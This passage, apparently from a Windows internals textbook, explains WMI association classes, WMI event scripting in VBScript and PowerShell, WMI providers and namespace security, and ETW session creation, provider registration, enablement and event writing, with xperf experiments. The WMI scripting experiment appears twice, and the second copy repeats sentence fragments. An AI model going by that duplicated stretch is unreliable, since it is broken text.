DisableOverride ToInstance ToSubClass]
class Win32_NTLogEventComputer
{
[key, read: ToSubClass] Win32_ComputerSystem ref Computer;
[key, read: ToSubClass] Win32_NTLogEvent ref Record;
};
Figure 10-29 shows a PowerShell window displaying the first Win32_NTLogEventComputer class
instance located in the CIMV2 namespace. From the aggregated class instance, a user can query the as-
sociated Win32_ComputerSystem object instance WIN-46E4EFTBP6Q, which generated the event with
record number 1031 in the Application log file.
FIGURE 10-29 The Win32_NTLogEventComputer association class.
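A small portable sketch (Python, with hypothetical class shapes rather than real WMI objects) shows the essential mechanics: the association instance carries nothing but a reference to each endpoint, and associated objects are found by scanning association instances for a matching ref:

```python
# Hypothetical sketch of an association class like Win32_NTLogEventComputer.
class Win32_ComputerSystem:
    def __init__(self, name):
        self.name = name

class Win32_NTLogEvent:
    def __init__(self, logfile, record_number):
        self.logfile, self.record_number = logfile, record_number

class Win32_NTLogEventComputer:
    def __init__(self, computer, record):
        self.computer = computer   # "ref Computer" in the MOF above
        self.record = record       # "ref Record" in the MOF above

computer = Win32_ComputerSystem("WIN-46E4EFTBP6Q")
event = Win32_NTLogEvent("Application", 1031)
associations = [Win32_NTLogEventComputer(computer, event)]

# Given the event, query the associated computer through the association.
owners = [a.computer for a in associations if a.record is event]
print(owners[0].name)  # WIN-46E4EFTBP6Q
```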
EXPERIMENT: Using WMI scripts to manage systems
A powerful aspect of WMI is its support for scripting languages. Microsoft has generated hun-
dreds of scripts that perform common administrative tasks for managing user accounts, files, the
registry, processes, and hardware devices. The Microsoft TechNet Scripting Center website serves
as the central location for Microsoft scripts. Using a script from the scripting center is as easy as
copying its text from your Internet browser, storing it in a file with a .vbs extension, and running
it with the command cscript script.vbs, where script is the name you gave the script.
Cscript is the command-line interface to Windows Script Host (WSH).
Here’s a sample TechNet script that registers to receive events when Win32_Process object
instances are created, which occurs whenever a process starts, and prints a line with the name of
the process that the object represents:
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colMonitoredProcesses = objWMIService. _
ExecNotificationQuery("SELECT * FROM __InstanceCreationEvent " _
& " WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'")
i = 0
Do While i = 0
Set objLatestProcess = colMonitoredProcesses.NextEvent
Wscript.Echo objLatestProcess.TargetInstance.Name
Loop
The line that invokes ExecNotificationQuery does so with a parameter that includes a select
statement, which highlights WMI’s support for a read-only subset of the ANSI standard Structured
Query Language (SQL), known as WQL, to provide a flexible way for WMI consumers to specify the
information they want to extract from WMI providers. Running the sample script with Cscript and
then starting Notepad results in the following output:
C:\>cscript monproc.vbs
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.
NOTEPAD.EXE
PowerShell supports the same functionality through the Register-WmiEvent and Get-Event
commands:
PS C:\> Register-WmiEvent -Query "SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE
TargetInstance ISA 'Win32_Process'" -SourceIdentifier "TestWmiRegistration"
PS C:\> (Get-Event)[0].SourceEventArgs.NewEvent.TargetInstance | Select-Object -Property
ProcessId, ExecutablePath
ProcessId ExecutablePath
--------- --------------
76016 C:\WINDOWS\system32\notepad.exe
PS C:\> Unregister-Event -SourceIdentifier "TestWmiRegistration"
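The WQL filter the script and cmdlets use can be illustrated portably. This Python sketch (event shapes hypothetical; real WMI delivers COM objects, not dictionaries) applies the `TargetInstance ISA 'Win32_Process'` condition to a stream of instance-creation notifications:

```python
# Hypothetical sketch of the WQL filter
#   SELECT * FROM __InstanceCreationEvent WITHIN 1
#   WHERE TargetInstance ISA 'Win32_Process'
# applied to a stream of notification events.
events = [
    {"class": "__InstanceCreationEvent",
     "TargetInstance": {"class": "Win32_Process", "Name": "NOTEPAD.EXE"}},
    {"class": "__InstanceCreationEvent",
     "TargetInstance": {"class": "Win32_Service", "Name": "Spooler"}},
]

def isa(instance, class_name):
    # Real WQL ISA also matches subclasses; exact equality is enough here.
    return instance["class"] == class_name

matches = [e["TargetInstance"]["Name"] for e in events
           if isa(e["TargetInstance"], "Win32_Process")]
print(matches)  # ['NOTEPAD.EXE']
```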
EXPERIMENT: Using WMI scripts to manage systems
A powerful aspect of WMI is its support for scripting languages. Microsoft has generated hun-
dreds of scripts that perform common administrative tasks for managing user accounts, files, the
registry, processes, and hardware devices. The Microsoft TechNet Scripting Center website serves
as the central location for Microsoft scripts. Using a script from the scripting center is as easy as
copying its text from your Internet browser, storing it in a file with a .vbs extension, and running
it with the command cscript script.vbs, where script is the name you gave the script.
Cscript is the command-line interface to Windows Script Host (WSH).
Here’s a sample TechNet script that registers to receive events when Win32_Process object
instances are created, which occur whenever a process starts and prints a line with the name of
the process that the object represents:
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colMonitoredProcesses = objWMIService. _
ExecNotificationQuery("SELECT * FROM __InstanceCreationEvent " _
& " WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'")
i = 0
Do While i = 0
Set objLatestProcess = colMonitoredProcesses.NextEvent
Wscript.Echo objLatestProcess.TargetInstance.Name
Loop
The line that invokes ExecNotificationQuery does so with a parameter that includes a
ExecNotificationQuery does so with a parameter that includes a
ExecNotificationQuery
select
statement, which highlights WMI’s support for a read-only subset of the ANSI standard Structured
Query Language (SQL), known as WQL, to provide a flexible way for WMI consumers to specify the
information they want to extract from WMI providers. Running the sample script with Cscript and
then starting Notepad results in the following output:
C:\>cscript monproc.vbs
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.
NOTEPAD.EXE
PowerShell supports the same functionality through the Register-WmiEvent and Get-Event
commands:
PS C:\> Register-WmiEvent -Query “SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE
TargetInstance ISA 'Win32_Process'” -SourceIdentifier “TestWmiRegistration”
PS C:\> (Get-Event)[0].SourceEventArgs.NewEvent.TargetInstance | Select-Object -Property
ProcessId, ExecutablePath
ProcessId ExecutablePath
--------- --------------
76016 C:\WINDOWS\system32\notepad.exe
PS C:\> Unregister-Event -SourceIdentifier "TestWmiRegistration"
WMI implementation
The WMI service runs in a shared Svchost process that executes in the local system account. It loads
providers into the WmiPrvSE.exe provider-hosting process, which launches as a child of the DCOM
Launcher (RPC service) process. WMI executes Wmiprvse in the local system, local service, or network
service account, depending on the value of the HostingModel property of the WMI Win32Provider ob-
ject instance that represents the provider implementation. A Wmiprvse process exits after the provider
is removed from the cache, one minute following the last provider request it receives.
EXPERIMENT: Viewing Wmiprvse creation
You can see WmiPrvSE being created by running Process Explorer and executing Wmic. A
WmiPrvSE process will appear beneath the Svchost process that hosts the DCOM Launcher
service. If Process Explorer job highlighting is enabled, it will appear with the job highlight color
because, to prevent a runaway provider from consuming all virtual memory resources on a
system, Wmiprvse executes in a job object that limits the number of child processes it can create
and the amount of virtual memory each process and all the processes of the job can allocate.
(See Chapter 5 for more information on job objects.)
Most WMI components reside by default in %SystemRoot%\System32 and %SystemRoot%\System32\
Wbem, including Windows MOF files, built-in provider DLLs, and management application WMI DLLs.
Look in the %SystemRoot%\System32\Wbem directory, and you’ll find Ntevt.mof, the Event Log provider
MOF file. You’ll also find Ntevt.dll, the Event Log provider’s DLL, which the WMI service uses.
Providers are generally implemented as dynamic link libraries (DLLs) exposing COM servers that
implement a specified set of interfaces (IWbemServices is the central one; generally, a single provider
is implemented as a single COM server). WMI includes many built-in providers for the Windows family of
operating systems. The built-in providers, also known as standard providers, supply data and manage-
ment functions from well-known operating system sources such as the Win32 subsystem, event logs,
performance counters, and registry. Table 10-15 lists several of the standard WMI providers included
with Windows.
TABLE 10-15 Standard WMI providers included with Windows
Provider                       Binary        Namespace               Description
Active Directory provider      dsprov.dll    root\directory\ldap     Maps Active Directory objects to WMI
Event Log provider             ntevt.dll     root\cimv2              Manages Windows event logs—for example, read,
                                                                     backup, clear, copy, delete, monitor, rename,
                                                                     compress, uncompress, and change event log settings
Performance Counter provider   wbemperf.dll  root\cimv2              Provides access to raw performance data
Registry provider              stdprov.dll   root\default            Reads, writes, enumerates, monitors, creates, and
                                                                     deletes registry keys and values
Virtualization provider        vmmsprox.dll  root\virtualization\v2  Provides access to virtualization services implemented
                                                                     in vmms.exe, like managing virtual machines in the
                                                                     host system and retrieving information of the host
                                                                     system peripherals from a guest VM
WDM provider                   wmiprov.dll   root\wmi                Provides access to information on WDM device drivers
Win32 provider                 cimwin32.dll  root\cimv2              Provides information about the computer, disks,
                                                                     peripheral devices, files, folders, file systems,
                                                                     networking components, operating system, printers,
                                                                     processes, security, services, shares, SAM users
                                                                     and groups, and more
Windows Installer provider     msiprov.dll   root\cimv2              Provides access to information about installed
                                                                     software
Ntevt.dll, the Event Log provider DLL, is a COM server, registered in the HKLM\Software\Classes\
CLSID registry key with the {F55C5B4C-517D-11d1-AB57-00C04FD9159E} CLSID. (You can find it in the
MOF descriptor.) Directories beneath %SystemRoot%\System32\Wbem store the repository, log files,
and third-party MOF files. WMI implements the repository—named the CIMOM object repository—
using a proprietary version of the Microsoft JET database engine. The database file, by default, resides
in %SystemRoot%\System32\Wbem\Repository\.
WMI honors numerous registry settings that the service’s HKLM\SOFTWARE\Microsoft\WBEM\
CIMOM registry key stores, such as thresholds and maximum values for certain parameters.
Device drivers use special interfaces to provide data to and accept commands—called the WMI
System Control commands—from WMI. These interfaces are part of the WDM, which is explained in
Chapter 6 of Part 1. Because the interfaces are cross-platform, they fall under the \root\WMI namespace.
WMI security
WMI implements security at the namespace level. If a management application successfully connects
to a namespace, the application can view and access the properties of all the objects in that namespace.
An administrator can use the WMI Control application to control which users can access a namespace.
Internally, this security model is implemented by using ACLs and Security Descriptors, part of the
standard Windows security model that implements Access Checks. (See Chapter 7 of Part 1 for more
information on access checks.)
To start the WMI Control application, open the Control Panel by typing Computer Management
in the Cortana search box. Next, open the Services And Applications node. Right-click WMI Control
and select Properties to launch the WMI Control Properties dialog box, as shown in Figure 10-30. To
configure security for namespaces, click the Security tab, select the namespace, and click Security.
The other tabs in the WMI Control Properties dialog box let you modify the performance and backup
settings that the registry stores.
FIGURE 10-30 The WMI Control Properties application and the Security tab of the root\virtualization\v2 namespace.
Event Tracing for Windows (ETW)
Event Tracing for Windows (ETW) is the main facility through which applications and kernel-mode
drivers can provide, consume, and manage log and trace events. The events can be stored in
a log file or in a circular buffer, or they can be consumed in real time. They can be used for debugging
a driver, a framework like the .NET CLR, or an application, and for understanding whether there could be
potential performance issues. The ETW facility is mainly implemented in the NT kernel, but an application
can also use private loggers, which do not transition to kernel mode at all. An application that uses
ETW falls into one of the following categories:
- Controller: A controller starts and stops event tracing sessions, manages the size of the buffer pools, and enables providers so they can log events to the session. Example controllers include Reliability and Performance Monitor and XPerf from the Windows Performance Toolkit (now part of the Windows Assessment and Deployment Kit, available for download from https://docs.microsoft.com/en-us/windows-hardware/get-started/adk-install).
- Provider: A provider is an application or a driver that contains event tracing instrumentation. A provider registers a provider GUID (globally unique identifier) with ETW, which defines the events it can produce. After the registration, the provider can generate events, which can be enabled or disabled by the controller application through an associated trace session.
- Consumer: A consumer is an application that selects one or more trace sessions from which it wants to read trace data. Consumers can receive events stored in log files, in a circular buffer, or from sessions that deliver events in real time.
It's important to mention that in ETW, every provider, session, trait, and provider group is
represented by a GUID (more information about these concepts is provided later in this chapter). Four
different technologies used for providing events are built on top of ETW. They differ mainly in the
method in which they store and define events (there are other distinctions, though):
- MOF (or classic) providers are the legacy ones, used especially by WMI. MOF providers store the event descriptors in MOF classes so that the consumer knows how to consume them.
- WPP (Windows software trace preprocessor) providers are used for tracing the operations of an application or driver (they are an extension of WMI event tracing) and use a TMF (trace message format) file to allow the consumer to decode trace events.
- Manifest-based providers use an XML manifest file to define events that can be decoded by the consumer.
- TraceLogging providers, which, like WPP providers, are used for fast tracing of the operations of an application or driver, use self-describing events that contain all the information required for their consumption by the consumer.
When first installed, Windows already includes dozens of providers, which are used by each component
of the OS for logging diagnostic events and performance traces. For example, Hyper-V has
multiple providers, which provide tracing events for the Hypervisor, Dynamic Memory, Vid driver, and
Virtualization stack. As shown in Figure 10-31, ETW is implemented in different components:
- Most of the ETW implementation (global session creation, provider registration and enablement, main logger thread) resides in the NT kernel.
- The Host for SCM/SDDL/LSA Lookup APIs library (sechost.dll) provides applications with the main user-mode APIs used for creating an ETW session, enabling providers, and consuming events. Sechost uses services provided by Ntdll to invoke ETW in the NT kernel. Some ETW user-mode APIs are implemented directly in Ntdll without exposing the functionality to Sechost. Provider registration and event generation are examples of user-mode functionality implemented in Ntdll (and not in Sechost).
- The Event Trace Decode Helper Library (TDH.dll) implements services available to consumers for decoding ETW events.
- The Eventing Consumption and Configuration library (WevtApi.dll) implements the Windows Event Log APIs (also known as Evt APIs), which are available to consumer applications for managing providers and events on local and remote machines. The Windows Event Log APIs support XPath 1.0 or structured XML queries for parsing events produced by an ETW session.
- The Secure Kernel implements basic secure services able to interact with the ETW implementation in the NT kernel, which lives in VTL 0. This allows trustlets and the Secure Kernel to use ETW for logging their own secure events.
[Figure residue: the diagram shows controller, provider, and consumer applications in user mode reaching the ETW implementation in the NT kernel through Sechost.dll, NTDLL.DLL, WevtApi.dll, and TDH.dll, with kernel drivers and the Secure Kernel interacting with ETW directly.]
FIGURE 10-31 ETW architecture.
ETW initialization
The ETW initialization starts early in the NT kernel startup (for more details on the NT kernel initial-
ization, see Chapter 12). It is orchestrated by the internal EtwInitialize function in three phases. The
phase 0 of the NT kernel initialization calls EtwInitialize to properly allocate and initialize the per-silo
ETW-specific data structure that stores the array of logger contexts representing global ETW sessions
(see the "ETW sessions" section later in this chapter for more details). The maximum number of global
sessions is queried from the HKLM\System\CurrentControlSet\Control\WMI\EtwMaxLoggers registry
value, which should be between 32 and 256 (64 is the default in case the registry value does not exist).
Later, in the NT kernel startup, the IoInitSystemPreDrivers routine of phase 1 continues with the
initialization of ETW, which performs the following steps:
1. Acquires the system startup time and reference system time, and calculates the QPC frequency.
2. Initializes the ETW security key and reads the default session and provider security descriptors.
3. Initializes the per-processor global tracing structures located in the PRCB.
4. Creates the real-time ETW consumer object type (called EtwConsumer), which is used to allow a user-mode real-time consumer process to connect to the main ETW logger thread, and the ETW registration object type (internally called EtwRegistration), which allows a provider to be registered from a user-mode application.
5. Registers the ETW bugcheck callback, used to dump logger session data in the bugcheck dump.
6. Initializes and starts the Global logger and Autologger sessions, based on the AutoLogger and GlobalLogger registry keys located under the HKLM\System\CurrentControlSet\Control\WMI root key.
7. Uses the EtwRegister kernel API to register various NT kernel event providers, like the Kernel Event Tracing, General Events provider, Process, Network, Disk, File Name, IO, and Memory providers, and so on.
8. Publishes the ETW initialized WNF state name to indicate that the ETW subsystem is initialized.
9. Writes the SystemStart event to both the Global Trace logging and General Events providers. The event, which is shown in Figure 10-32, logs the approximate OS startup time.
10. If required, loads the FileInfo driver, which provides supplemental information on file I/O to Superfetch (more information on proactive memory management is available in Chapter 5 of Part 1).
FIGURE 10-32 The SystemStart ETW event displayed by the Event Viewer.
In early boot phases, the Windows registry and I/O subsystems are still not completely initialized. So
ETW can’t directly write to the log files. Late in the boot process, after the Session Manager (SMSS.exe)
has correctly initialized the software hive, the last phase of ETW initialization takes place. The purpose
of this phase is just to inform each already-registered global ETW session that the file system is ready,
so that they can flush out all the events that are recorded in the ETW buffers to the log file.
ETW sessions
One of the most important entities of ETW is the Session (internally called the logger instance), which is
the glue between providers and consumers. An event tracing session records events from one or more
providers that a controller has enabled. A session usually contains all the information that describes which
events should be recorded by which providers and how the events should be processed. For example,
a session might be configured to accept all events from the Microsoft-Windows-Hyper-V-Hypervisor
provider (which is internally identified using the {52fc89f8-995e-434c-a91e-199986449890} GUID). The
user can also configure filters. Each event generated by a provider (or a provider group) can be filtered
based on event level (information, warning, error, or critical), event keyword, event ID, and other char-
acteristics. The session configuration can also define various other details for the session, such as what
time source should be used for the event timestamps (for example, QPC, TSC, or system time), which
events should have stack traces captured, and so on. The session has the important role of hosting the
ETW logger thread, which is the main entity that flushes the events to the log file or delivers them to
the real-time consumer.
Sessions are created using the StartTrace API and configured using ControlTrace and EnableTraceEx2.
Command-line tools such as xperf, logman, tracelog, and wevtutil use these APIs to start or control
trace sessions. A session can also be configured to be private to the process that creates it. In this case,
ETW is used for consuming events created only by the same application, which also acts as the provider.
The application thus eliminates the overhead associated with the kernel-mode transition. Private ETW
sessions can record only events generated by the threads of the process in which they execute and cannot
be used with real-time delivery. The internal architecture of private ETW is not described in this book.
When a global session is created, the StartTrace API validates the parameters and copies them in a
data structure, which the NtTraceControl API uses to invoke the internal function EtwpStartLogger in the
kernel. An ETW session is represented internally through an ETW_LOGGER_CONTEXT data structure,
which contains the important pointers to the session memory buffers, where the events are written
to. As discussed in the “ETW initialization” section, a system can support a limited number of ETW ses-
sions, which are stored in an array located in a global per-SILO data structure. EtwpStartLogger checks
the global sessions array, determining whether there is free space or if a session with the same name
already exists. If that is the case, it exits and signals an error. Otherwise, it generates a session GUID (if
not already specified by the caller), allocates and initializes an ETW_LOGGER_CONTEXT data structure
representing the session, assigns to it an index, and inserts it in the per-silo array.
ETW queries the session's security descriptor located in the HKLM\System\CurrentControlSet\
Control\Wmi\Security registry key. As shown in Figure 10-33, each registry value in the key is named
after the session GUID (the registry key, however, also contains provider GUIDs) and contains the binary
representation of a self-relative security descriptor. If a security descriptor for the session does not exist,
a default one is returned for the session (see the "Witnessing the default security descriptor of ETW
sessions" experiment later in this chapter for details).
FIGURE 10-33 The ETW security registry key.
The EtwpStartLogger function performs an access check on the session's security descriptor, requesting
the TRACELOG_GUID_ENABLE access right (and TRACELOG_CREATE_REALTIME or TRACELOG_
CREATE_ONDISK, depending on the log file mode) using the current process's access token. If the check
succeeds, the routine calculates the default size and number of event buffers, based on the size of the
system's physical memory (the default buffer size is 8, 16, or 64 KB). The number of buffers depends on
the number of system processors and on the presence of the EVENT_TRACE_NO_PER_PROCESSOR_
BUFFERING logger mode flag, which prevents events (which can be generated by different processors)
from being written to per-processor buffers.
ETW acquires the session's initial reference time stamp. Three clock resolutions are currently supported:
Query performance counter (QPC, a high-resolution time stamp not affected by the system clock),
System time, and CPU cycle counter. The EtwpAllocateTraceBuffer function is used to allocate each buffer
associated with the logger session (the number of buffers was calculated before or specified as input
from the user). A buffer can be allocated from the paged pool, nonpaged pool, or directly from physical
large pages, depending on the logging mode. Each buffer is stored in multiple internal per-session lists,
which are able to provide fast lookup both to the ETW main logger thread and ETW providers. Finally,
if the log mode is not set to a circular buffer, the EtwpStartLogger function starts the main ETW logger
thread, which has the goal of flushing events written by the providers associated with the session to the
log file or to the real-time consumer. After the main thread is started, ETW sends a session notification to
the registered session notification provider (GUID 2a6e185b-90de-4fc5-826c-9f44e608a427), a special
provider that allows its consumers to be informed when certain ETW events happen (like a new session
being created or destroyed, a new log file being created, or a log error being raised).
EXPERIMENT: Enumerating ETW sessions
In Windows 10, there are multiple ways to enumerate active ETW sessions. In this and all the
next experiments regarding ETW, you will use the XPERF tool, which is part of the Windows
Performance Toolkit distributed in the Windows Assessment and Deployment Kit (ADK), which
is freely downloadable from https://docs.microsoft.com/en-us/windows-hardware/get-started/
adk-install.
Enumerating active ETW sessions can be done in multiple ways. XPERF can do it when
executed with the following command (usually XPERF is installed in C:\Program Files
(x86)\Windows Kits\10\Windows Performance Toolkit):

xperf -Loggers

The output of the command can be huge, so it is strongly advised to redirect the output to
a TXT file:

xperf -Loggers > ETW_Sessions.txt
The tool can decode and show in a human-readable form all the session configuration data.
An example is given by the EventLog-Application session, which is used by the Event logger
service (Wevtsvc.dll) to write events to the Application.evtx file shown by the Event Viewer:
Logger Name           : EventLog-Application
Logger Id             : 9
Logger Thread Id      : 000000000000008C
Buffer Size           : 64
Maximum Buffers       : 64
Minimum Buffers       : 2
Number of Buffers     : 2
Free Buffers          : 2
Buffers Written       : 252
Events Lost           : 0
Log Buffers Lost      : 0
Real Time Buffers Lost: 0
Flush Timer           : 1
Age Limit             : 0
Real Time Mode        : Enabled
Log File Mode         : Secure PersistOnHybridShutdown PagedMemory IndependentSession
                        NoPerProcessorBuffering
Maximum File Size     : 100
Log Filename          :
Trace Flags           : "Microsoft-Windows-CertificateServicesClient-Lifecycle-User":
                        0x8000000000000000:0xff+"Microsoft-Windows-SenseIR":0x8000000000000000:0xff+
... (output cut for space reasons)
The tool is also able to decode the name of each provider enabled in the session and the
bitmask of event categories that the provider should write to the session. The interpretation of
the bitmask (shown under "Trace Flags") depends on the provider. For example, a provider can
define that category 1 (bit 0 set) indicates the set of events generated during initialization
and cleanup, category 2 (bit 1 set) indicates the set of events generated when registry I/O is
performed, and so on. The trace flags are interpreted differently for System sessions (see the
"System loggers" section for more details). In that case, the flags are decoded from the enabled
kernel flags that specify which kind of kernel events the system session should log.
The Windows Performance Monitor, in addition to dealing with system performance counters,
can easily enumerate the ETW sessions. Open Performance Monitor (by typing perfmon in the
Cortana search box), expand Data Collector Sets, and click Event Trace Sessions. The application
should list the same sessions listed by XPERF. If you right-click a session's name and select
Properties, you should be able to navigate through the session's configuration. In particular, the
Security property sheet decodes the security descriptor of the ETW session.
Finally, you also can use the Microsoft Logman console tool (%SystemRoot%\System32\
logman.exe) to enumerate active ETW sessions (by using the -ets command-line argument).
ETW providers
As stated in the previous sections, a provider is a component that produces events (while the applica-
tion that includes the provider contains event tracing instrumentation). ETW supports different kinds
of providers, which all share a similar programming model. (They are mainly different in the way in
which they encode events.) A provider must be initially registered with ETW before it can generate any
event. In a similar way, a controller application should enable the provider and associate it with an ETW
session to be able to receive events from the provider. If no session has enabled a provider, the pro-
vider will not generate any event. The provider defines its interpretation of being enabled or disabled.
Generally, an enabled provider generates events, and a disabled provider does not.
Provider registration
Each provider type has its own API that needs to be called by a provider application (or driver) to
register a provider. For example, manifest-based providers rely on the EventRegister API for user-mode
registrations, and EtwRegister for kernel-mode registrations. All the provider types end up calling the
internal EtwpRegisterProvider function, which performs the actual registration process (and is implemented
in both the NT kernel and NTDLL). The function allocates and initializes an ETW_GUID_ENTRY data
structure, which represents the provider (the same data structure is used for notifications and traits).
The data structure contains important information, like the provider GUID, security descriptor, reference
counter, enablement information (for each ETW session that enables the provider), and a list of the
provider's registrations.
For user-mode provider registrations, the NT kernel performs an access check on the calling process's
token, requesting the TRACELOG_REGISTER_GUIDS access right. If the check succeeds, or if the
registration request originated from kernel code, ETW inserts the new ETW_GUID_ENTRY data structure
in a hash table located in the global ETW per-silo data structure, using a hash of the provider's
GUID as the table's key (this allows fast lookup of all the providers registered in the system). In case an
entry with the same GUID already exists in the hash table, ETW uses the existing entry instead of the
new one. A GUID could already exist in the hash table mainly for two reasons:

- Another driver or application has enabled the provider before it has actually been registered (see the "Provider Enablement" section later in this chapter for more details).
- The provider has already been registered once. Multiple registrations of the same provider GUID are supported.
After the provider has been successfully added into the global list, ETW creates and initializes an
ETW registration object, which represents a single registration. The object encapsulates an ETW_REG_
ENTRY data structure, which ties the provider to the process and session that requested its registration.
(ETW also supports registration from different sessions.) The object is inserted in a list located in the
ETW_GUID_ENTRY (the EtwRegistration object type has been previously created and registered with
the NT object manager at ETW initialization time). Figure 10-34 shows the two data structures and their
relationships. In the figure, two provider processes (process A, living in session 4, and process B, living
in session 16) have registered for provider 1. Thus, two ETW_REG_ENTRY data structures have been
created and linked to the ETW_GUID_ENTRY representing provider 1.
[Figure residue: the diagram shows the global per-silo hash table of ETW_GUID_ENTRY structures (each holding the provider's GUID, security descriptor, reference counter, enablement information, and filter data) with linked ETW_REG_ENTRY registration entries for the provider applications in sessions 0x4 and 0x10.]
FIGURE 10-34 The ETW_GUID_ENTRY data structure and the ETW_REG_ENTRY.
At this stage, the provider is registered and ready to be enabled in the session(s) that requested it
(through the EnableTrace API). In case the provider has already been enabled in at least one session before
its registration, ETW enables it (see the next section for details) and calls the Enablement callback, which can
be specified by the caller of the EventRegister (or EtwRegister) API that started the registration process.
EXPERIMENT: Enumerating ETW providers
As for ETW sessions, XPERF can enumerate the list of all the currently registered providers (the
WEVTUTIL tool, installed with Windows, can do the same). Open an administrative command
prompt window and move to the Windows Performance Toolkit path. To enumerate the registered
providers, use the -providers command option. The option supports different flags.
For this experiment, you will be interested in the I and R flags, which tell XPERF to enumerate
the installed or registered providers. As we will discuss in the "Decoding events" section later
in this chapter, the difference is that a provider can be registered (by specifying a GUID) but
not installed in the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers
registry key. This will prevent any consumer from decoding the event using TDH routines. The
following commands

cd /d "C:\Program Files (x86)\Windows Kits\10\Windows Performance Toolkit"
xperf -providers R > registered_providers.txt
xperf -providers I > installed_providers.txt

produce two text files with similar information. If you open the registered_providers.txt file,
you will find a mix of names and GUIDs. Names identify providers that are also installed in the
Publishers registry key, whereas GUIDs represent providers that have just been registered through
the EventRegister API discussed in this section. All the names are also present in the installed_
providers.txt file with their respective GUIDs, but you won't find any of the bare GUIDs from the
first text file in the installed providers list.

XPERF also supports the enumeration of all the kernel flags and groups supported by system
loggers (discussed in the "System loggers" section later in this chapter) through the K flag (which
is a superset of the KF and KG flags).
Provider Enablement
As introduced in the previous section, a provider should be associated with an ETW session to be able
to generate events. This association is called Provider Enablement, and it can happen in two ways:
before or after the provider is registered. A controller application can enable a provider on a session
through the EnableTraceEx API. The API allows you to specify a bitmask of keywords that determine the
category of events that the session wants to receive. In the same way, the API supports advanced filters
on other kinds of data, like the process IDs that generate the events, package ID, executable name,
and so on. (You can find more information at https://docs.microsoft.com/en-us/windows/win32/api/
evntprov/ns-evntprov-event_filter_descriptor.)
Provider Enablement is managed by ETW in kernel mode through the internal EtwpEnableGuid
function. For user-mode requests, the function performs an access check on both the session and
provider security descriptors, requesting the TRACELOG_GUID_ENABLE access right on behalf of
the calling process’s token. If the logger session includes the SECURITY_TRACE flag, EtwpEnableGuid
requires that the calling process is a PPL (see the “ETW security” section later in this chapter for more
details). If the check succeeds, the function performs a similar task to the one discussed previously for
provider registrations:
- It allocates and initializes an ETW_GUID_ENTRY data structure to represent the provider, or uses the one already linked in the global ETW per-silo data structure in case the provider has already been registered.
- It links the provider to the logger session by adding the relative session enablement information in the ETW_GUID_ENTRY.

In case the provider has not been previously registered, no ETW registration object exists that's
linked in the ETW_GUID_ENTRY data structure, so the procedure terminates. (The provider will be
enabled after it is first registered.) Otherwise, the provider is enabled.
While legacy MOF providers and WPP providers can be enabled for only one session at a time,
Manifest-based and TraceLogging providers can be enabled for a maximum of eight sessions. As
previously shown in Figure 10-34, the ETW_GUID_ENTRY data structure contains enablement information
for each possible ETW session that enabled the provider (eight maximum). Based on the enabled
sessions, the EtwpEnableGuid function calculates a new session enablement mask, storing it in the
ETW_REG_ENTRY data structure (representing the provider registration). The mask is very important
because it's the key for event generation. When an application or driver writes an event to the provider,
a check is made: if a bit in the enablement mask equals 1, it means that the event should be written to
the buffer maintained by a particular ETW session; otherwise, the session is skipped and the event is
not written to its buffer.
Note that for secure sessions, a supplemental access check is performed before updating the ses-
sion enablement mask in the provider registration. The ETW session’s security descriptor should allow
the TRACELOG_LOG_EVENT access right to the calling process’s access token. Otherwise, the relative
bit in the enablement mask is not set to 1. (The target ETW session will not receive any event from the
provider registration.) More information on secure sessions is available in the “Secure loggers and ETW
security” section later in this chapter.
Providing events
After registering one or more ETW providers, a provider application can start to generate events. Note
that events can be generated even though a controller application hasn’t had the chance to enable the
provider in an ETW session. The way in which an application or driver can generate events depends on
the type of the provider. For example, applications that write events to manifest-based providers usu-
ally directly create an event descriptor (which respects the XML manifest) and use the EventWrite API
to write the event to the ETW sessions that have the provider enabled. Applications that manage MOF
and WPP providers rely on the TraceEvent API instead.
Events generated by manifest-based providers, as discussed previously in the “ETW session” sec-
tion, can be filtered by multiple means. ETW locates the ETW_GUID_ENTRY data structure from the
provider registration object, which is provided by the application through a handle. The internal
EtwpEventWriteFull function uses the provider’s registration session enablement mask to cycle between
all the enabled ETW sessions associated with the provider (represented by an ETW_LOGGER_CONTEXT).
For each session, it checks whether the event satisfies all the filters. If so, it calculates the full size of the
event’s payload and checks whether there is enough free space in the session’s current buffer.
If there is no available space, ETW checks whether there is another free buffer in the session: free
buffers are stored in a FIFO (first-in, first-out) queue. If there is a free buffer, ETW marks the old buffer
as “dirty” and switches to the new free one. In this way, the Logger thread can wake up and flush the
entire buffer to a log file or deliver it to a real-time consumer. If the session’s log mode is a circular log-
ger, no logger thread is ever created: ETW simply links the old full buffer at the end of the free buffers
queue (as a result the queue will never be empty). Otherwise, if there isn’t a free buffer in the queue,
ETW tries to allocate an additional buffer before returning an error to the caller.
After enough space in a buffer is found, EtwpEventWriteFull atomically writes the entire event
payload in the buffer and exits. Note that in case the session enablement mask is 0, it means that no
sessions are associated with the provider. As a result, the event is lost and not logged anywhere.
MOF and WPP events go through a similar procedure but support only a single ETW session and
generally support fewer filters. For these kinds of providers, a supplemental check is performed on the
associated session: If the controller application has marked the session as secure, nobody can write
any events. In this case, an error is yielded back to the caller (secure sessions are discussed later in the
“Secure loggers and ETW security” section).
EXPERIMENT: Listing processes activity using ETW
In this experiment, you will use ETW to monitor the system's process activity. Windows 10 has two providers that can monitor this information: Microsoft-Windows-Kernel-Process and the NT kernel logger through the PROC_THREAD kernel flags. You will use the former, which is a classic provider and already has all the information for decoding its events. You can capture the trace with multiple tools; here you will use XPERF (the Windows Performance Monitor can be used, too).
Open a command prompt window and type the following commands:
cd /d "C:\Program Files (x86)\Windows Kits\10\Windows Performance Toolkit"
xperf -start TestSession -on Microsoft-Windows-Kernel-Process -f c:\process_trace.etl
The command starts an ETW session called TestSession (you can replace the name) that will
consume events generated by the Kernel-Process provider and store them in the C:\process_
trace.etl log file (you can also replace the file name).
